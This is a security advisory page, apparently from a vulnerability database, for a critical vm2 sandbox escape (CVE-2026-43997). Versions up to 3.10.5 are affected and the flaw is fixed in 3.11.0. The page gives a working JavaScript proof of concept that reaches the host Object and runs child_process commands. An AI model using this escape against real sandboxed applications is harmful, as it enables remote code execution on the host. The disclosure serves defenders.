GHSA-47X8-96VW-5WG6

Vulnerability from github – Published: 2026-05-07 04:00 – Updated: 2026-05-14 20:36
VLAI
Summary
vm2 Access to Host Object Enables Sandbox Escape
Details

Summary

It is possible to obtain the host Object, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.

Details

There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)

PoC

const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);

const obj = {
    [sym]: (depth, opt, inspect) => {
        inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
    },
    valueOf: undefined,
    constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

Severity
10.0 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.10.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43997"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T04:00:19Z",
    "nvd_published_at": "2026-05-13T18:16:16Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nIt is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.\n\n### Details\n\nThere are various ways to use the host `Object`, to escape the sandbox, one example would be using  `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`\n\n### PoC\n\n```js\nconst g = {}.__lookupGetter__;\nconst a = Buffer.apply;\nconst p = a.apply(g, [Buffer, [\u0027__proto__\u0027]]);\nconst o = p.call(p.call(a));\nconst HObject = o.constructor;\nsym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);\n\nconst obj = {\n\t[sym]: (depth, opt, inspect) =\u003e {\n\t\tinspect.constructor(\"return process.getBuiltinModule(\u0027child_process\u0027).execSync(\u0027ls\u0027,{stdio:\u0027inherit\u0027})\")();\n\t},\n\tvalueOf: undefined,\n\tconstructor: undefined,\n};\n\nWebAssembly.compileStreaming(obj).catch(() =\u003e {});\n```\n\n### Impact\n\nSandbox Escape -\u003e RCE",
  "id": "GHSA-47x8-96vw-5wg6",
  "modified": "2026-05-14T20:36:28Z",
  "published": "2026-05-07T04:00:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43997"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 Access to Host Object Enables Sandbox Escape"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.